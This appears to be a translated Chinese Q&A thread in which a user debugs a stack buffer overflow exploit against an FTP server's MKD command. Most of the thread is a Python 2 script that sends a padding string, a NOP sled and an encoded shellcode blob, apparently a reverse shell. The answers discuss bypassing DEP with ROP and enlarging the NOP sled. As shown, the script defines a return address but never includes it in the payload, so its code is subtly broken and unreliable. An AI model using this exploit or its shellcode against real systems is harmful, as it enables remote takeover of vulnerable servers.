免疫调试器:执行时发生访问冲突

问题描述 投票:0回答:3

我正在编写一个简单的利用代码,使用 jmp 到 esp,但是在转到地址 00B7FC2C 的 esp 后,免疫显示错误:执行 [00B7FC2C] 时发生访问冲突

这是我的代码:

#!/usr/bin/python2.7

import  sys, os, socket

fuzz = "\x41" * 248
eip = "\x59\x54\xC3\x77"
nops = "\x90" * 8

shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"

command = "MKD"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('10.0.0.2',21))
print "\n" + s.recv(1024)
s.send('USER anonymous\r\n')
print "\n" + s.recv(1024)
s.send('PASS \r\n')
print "\n" + s.recv(1024)
s.send(command + '' + fuzz + nops + shellcode + '\r\n')
print "\n" + s.recv(1024)
s.send('QUIT\r\n')
s.close()
exploit shellcode
3个回答
2
投票

由于您没有在地址或注册表值中包含操作码,我将指出最可能的解释。您正在利用的进程似乎利用了 

Data Execution Protection
(DEP) 来防止堆栈上的数据作为代码执行。在 DEP 下执行 shellcode 的技巧是使用 
Return Oriented Programming
(ROP) 调用 VirtualProtect() 或类似函数,在将控制权返回给 shellcode 之前对保存 shellcode 的内存区域禁用 DEP。您可以在此处找到有关绕过 DEP 的更多信息:https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the -rubikstm-立方体

0
投票

我也遇到过类似的问题,结果发现将 

nops
变量增加到 16 甚至 32 将有助于获得 revshell。

0
投票

我在使用 python3 时也遇到了同样的问题。如果您使用 python3 是解决方案,请将其编码为“latin-1”

最新问题
© www.soinside.com 2019 - 2024. All rights reserved.